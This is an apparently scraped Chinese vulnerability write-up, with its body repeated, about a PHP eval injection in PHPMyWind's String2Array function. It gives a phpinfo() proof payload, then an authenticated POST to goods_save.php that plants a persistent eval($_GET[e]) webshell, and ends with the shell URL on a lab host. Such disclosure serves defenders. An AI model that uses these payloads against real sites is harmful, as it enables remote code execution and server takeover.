VULHUB ™

<ul><li>/include/common.func.php</li></ul><pre class="">/*字符串转数组*/ if(!function_exists('String2Array')) { function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); return $array; } } <br></pre><p>$data变量进入eval执行，当传入$data为：<br></p><pre class="">111|222{${phpinfo()}}</pre><p>执行的PHP语句为：</p><pre class="">@eval("$array = array("1"=&gt;"111|222{${phpinfo()}}","2"=&gt;"");;")</pre><p>页面返回：&nbsp;</p><p><img alt="3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" src="https://images.seebug.org/@/uploads/1434594139629-3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" data-image-size="628,390"><br></p><p>证明漏洞存在。</p><p>以可以发表文章的帐号登陆；</p><p>POST数据：</p><pre class="">classid=12&amp;typeid=10&amp;attrvalue[]=111|222{${eval($_GET[e])}}&amp;attrid[]=1&amp;attrid[]=2&amp;checkinfo=true&amp;action=add</pre><p>到地址：</p><pre class="">http://10.211.55.3/phpmywind/admin/goods_save.php</pre><p>得到id为38；&nbsp;</p><p><img alt="8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png"...

<ul><li>/include/common.func.php</li></ul><pre class="">/*字符串转数组*/ if(!function_exists('String2Array')) { function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); return $array; } } <br></pre><p>$data变量进入eval执行，当传入$data为：<br></p><pre class="">111|222{${phpinfo()}}</pre><p>执行的PHP语句为：</p><pre class="">@eval("$array = array("1"=&gt;"111|222{${phpinfo()}}","2"=&gt;"");;")</pre><p>页面返回：&nbsp;</p><p><img alt="3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" src="https://images.seebug.org/@/uploads/1434594139629-3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" data-image-size="628,390"><br></p><p>证明漏洞存在。</p><p>以可以发表文章的帐号登陆；</p><p>POST数据：</p><pre class="">classid=12&amp;typeid=10&amp;attrvalue[]=111|222{${eval($_GET[e])}}&amp;attrid[]=1&amp;attrid[]=2&amp;checkinfo=true&amp;action=add</pre><p>到地址：</p><pre class="">http://10.211.55.3/phpmywind/admin/goods_save.php</pre><p>得到id为38；&nbsp;</p><p><img alt="8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png" src="https://images.seebug.org/@/uploads/1434594188966-8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png" data-image-size="811,171"><br></p><p>得到Shell地址：</p><pre class="">http://10.211.55.3/phpmywind/goodsshow.php?cid=12&amp;tid=10&amp;id=38&amp;e=phpinfo();</pre><p><img alt="824AC4F3-7298-488A-A66E-A7813F47071D.png" src="https://images.seebug.org/@/uploads/1434594195950-824AC4F3-7298-488A-A66E-A7813F47071D.png" data-image-size="766,469"><br></p>